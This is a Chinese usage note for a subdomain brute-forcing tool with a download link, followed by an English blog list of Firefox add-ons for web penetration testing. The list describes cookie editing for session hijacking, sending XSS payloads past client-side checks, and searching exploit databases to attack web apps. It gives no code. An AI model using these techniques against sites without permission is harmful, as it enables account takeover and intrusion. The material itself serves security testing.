1.如果要使用自定义字典,请把字典文件命名为dic,放到跟程序同目录下,程序会自动加载字典。
2.如果没有自定义字典,程序会自动使用内置字典,内置字典总共两万多条数据,内容包括了常用子域名,以及3000+常用单词和1-3位所有字母。
3.如果要爆破二级以下域名,可以直接填入要爆破的子域名,程序会自动拼接下一级子域。比如填入baidu.com,程序会爆破baidu.com下面的域。
4.如果界面列表显示有空白,请右键选择“导出域名和IP”来导出完整列表。

百度网盘下载:下载地址连 接 链 接: https://pan.baidu.com/s/1pLoGnDh 密码: g3f6

Extensions For Turning Firefox Into a Penetration Testing Tool 中国骇客云之火狐浏览器渗透工具下载!

Firefox is a popular web browser from Mozilla. Popularity of Firefox is not only because it’s a good web browser, it also supports add-ons to enhance the functionality. Mozilla has a websiteadd-on sectionthat has thousands of useful add-ons in different categories. Some of these add-ons are useful for penetration testers and security analysts. These penetration testing add-ons helps in performing different kinds of attacks, and modify request headers direct from the browser. This way, it reduces the use of a separate tool for most of the penetration testing related tasks.

LEARN PENETRATION TESTING FROM TOP HACKERSLEARN PENETRATION TESTING FROM TOP HACKERS

In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. Use what you think helpful. All these add-ons are available for free and you can download from the Mozilla add-on website. There are some premium add-ons like Dominator pro which is also available for purchase from official websites. See the list of free add-ons below.

Firefox Add-ons for Security Researchers and Penetration Testers

  1. FoxyProxy Standard
    FoxyProxy is an advanced proxy management add-on for Firefox browser. It improves the built-in proxy capabilities of Firefox. There are few other similar kind of proxy management add-ons available, but it offers more features that other add-ons. Based on the URL patterns, it switches internet connection across one or more proxy servers. When proxy is in use, it also displays an animated icon. In case you want to see the proxies used by the tool, you can see the logs.

    AddFoxyProxyto you browser from this link:https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

  2. Firebug
    Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.AddFirebugin your Browser from this link:https://addons.mozilla.org/en-US/firefox/addon/firebug/
  3. Web Developer
    Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.AddWeb Developerin your browser from this link:https://addons.mozilla.org/de/firefox/addon/web-developer/

  4. User Agent Switcher
    User Agent Switcher add-on; adds a one click user agent switch to the browser. It adds a menu and tool bar button in the browser. Whenever you want to switch the user agent, use the browser button. User Agent add on helps in spoofing the browser while performing some attacks.

    AddUser Agent Switcherto your browser from this link:https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

  5. Live HTTP Headers
    Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each http request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process.AddLive HTTP Headersto Firefox with this link:https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

  6. Tamper Data
    Tamper Data is similar to the Live HTTP Header add-on but, has header editing capabilities. With the tamper data add-on, you can view and modify HTTP/HTTPS headers and post parameters. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data.Add theTamper dataadd-on to Firefox browser with this link:https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

  7. Hackbar
    Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.AddHackbaradd-on to Firefox browser with this link:https://addons.mozilla.org/en-US/firefox/addon/hackbar/
  8. Websecurify
    Websecurify is a nice penetration testing tool that is also available as add-on for Firefox. We have already covered WebSecurify in detail in previous article. WebSecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerability. Unlike other listed tools, it is a complete penetration testing tool in itself available as a browser add-on. It gives most of the features available in standalone tool.AddWebSecurifyto Firefox browser with this link:https://addons.mozilla.org/en-us/firefox/addon/websecurify/

  9. Add N Edit Cookies
    “Add N Edit Cookies” is a cookie editing add-on that allows you to add and edit cookies data in your browser. With this tool, you can easily add session data manually in cookies. This tool is performed in session hijacking attack when you have the active cookies of the user. Edit your cookies to add the data and hijack the account.To downloadAdd N Edit Cookiesto Your Firefox browser:https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies-13793/

  10. XSS Me
    Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that renders a payload on the page, and may be vulnerable to XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.AddXSS Me
    to your Firefox browser:https://addons.mozilla.org/en-us/firefox/addon/xss-me/

  11. SQL Inject Me
    SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but display that it exists. SQL injection is one of the most harmful web application vulnerabilities, it can allow attackers to view, modify, edit, add or delete records in a database.The tool sends escape strings through form fields, and tries to search database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing.AddSQL Inject Me
    add-on to your browser:https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

  12. FlagFox
    FlagFox is another interesting add-on. Once installed in the browser, it displays the country’s flag to tell the location of the web server. It also comes with other tools like whois, WOT scorecard and ping.AddFlagFoxin your browser:https://addons.mozilla.org/en-us/firefox/addon/flagfox/

  13. CryptoFox
    CryptoFox is an encryption or decryption tool for Mozilla Firefox. It supports most of the available encryption algorithm. So, you can easily encrypt or decrypt data with supported encryption algorithm. This add-on comes with dictionary attack support, to crack MD5 cracking passwords. Although, it hasn’t have good reviews, it works satisfactorily.AddCryptoFoxadd-on to your browser:https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

  14. Access Me
    Access Me, is another add-on for security testing professionals. This add-on is developed by the company that works on XSS Me and SQL Inject Me. Access Me is the can Exploit-Me tool used for testing access vulnerabilities in web applications. This tool works by sending several versions of page requests. A request using the HTTP HEAD verb and a request using a made up SECCOM verb will be sent. A combination of session and HEAD/SECCOM will also be sent.AddAccess Meto Firefox from this link:https://addons.mozilla.org/en-US/firefox/addon/access-me/

  15. SecurityFocus Vulnerabilities search plugin
    SecurityFocus Vulnerabilities search plugin, is not a security tool but a search plugin that lets users search for vulnerabilities from the Security Focus database.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/
  16. Packet Storm search plugin
    This is another search plugin that lets users search for tools and exploits from packetstormsecurity.org. The website offers free up-to-date security tools, exploits and advisories.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/
  17. Offsec Exploit-db Search
    This is another plugin similar to the last two above. It also lets users search for vulnerabilities and exploits listed in exploit-db.com. This website is always up-to-date with latest exploits and vulnerability details.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/
  18. Snort IDS Rule Search
    Snort IDS Rule Search is another search add-on for Firefox. It lets users search for Snort IDS rules on the snort.org website. Snort is the most widely deployed IDS/IPS technology worldwide. It’s an open source network Intrusion prevention and detection system with more than 400,000 users.AddSnort IDS Rule Searchto Firefox here:https://addons.mozilla.org/en-US/firefox/addon/snort-ids-rule-search/

These are few add-ons that you can use while web application penetration testing. Although, you cannot finish complete penetration testing work with these tools, but these browser tools are useful for most of the tasks and reduce the use of separate tools.

Hackbar, SQL Inject Me, XSS Me and WebSecurify are the browser tools that are widely used for finding vulnerabilities in web applications. Other tools are used for specific work which helps in getting information while penetration testing.

How to install these add-ons in the Firefox browser

Installation of these add-ons in the Firefox browser is really simple. I added links of each Add-on to make installation easier. Just follow the link, and you will land on the add-on page. Find the big “download” button to start downloading. In the next page, you will find terms and conditions. Just below that, you will see the “accept and install” button. Then it will open a pop-up and installation begins in 3 seconds. After installation is complete, you will need to restart the browser. Everything is just a click away. I am not describing the process with screenshots because I assume that you already know how to install add-ons in Mozilla Firefox.

LEARN PENETRATION TESTING FROM TOP HACKERSLEARN PENETRATION TESTING FROM TOP HACKERS

Conclusion

Firefox is not only a nice browser, but also a friend of penetration testers and security researchers. With the given Add-ons, you can enhance the functionality of Firefox in the way that is useful for the penetration testing process. Some of these tools help in gathering information about a website and its servers. A few other tools help in intercepting and modifying header information, to perform attacks via headers. In case you are trying to perform session hijacking, you can use an add-on to edit the cookies with the cookie data stolen from a user’s browser. SQL Inject ME, XSS Me and Websecurify are semi-automated tools to scan the page, and find the vulnerabilities that may be on the website. These 3 tools are dedicated security tools with a good success rate. We have covered WebSecurify in earlier posts. You can read more about the tool to know how it actually works. Hackbar is the best tool when you want to test a form against Post XSS. Hackbar helps you to manually submit a form to send POST data. If the app has client side validation in form, and has few limits in length and input, you can use Hackbar to submit form data manually and see the effect. It also has encoding tools to encode your XSS payloads, without using any separate tool. Most of the people involved in the security testing field use this tool.

Few tools are just search add-ons that can help you to search exploits and advisories from popular databases. You can use these add-ons to find the appropriate exploit to perform an attack on the web application, to check whether the app is affected with this known exploit or not.

I am sure you will like few of these add-ons and will use them in your security testing process.

I personally use Hackbar, SQL Inject Me, XSS me, WebSecurify, Add N Edit Cookies, Live HTTP Headers, Tamper data, FoxyProxy standard and Firebug.

Which add-on you would like to use? Share your views via comments.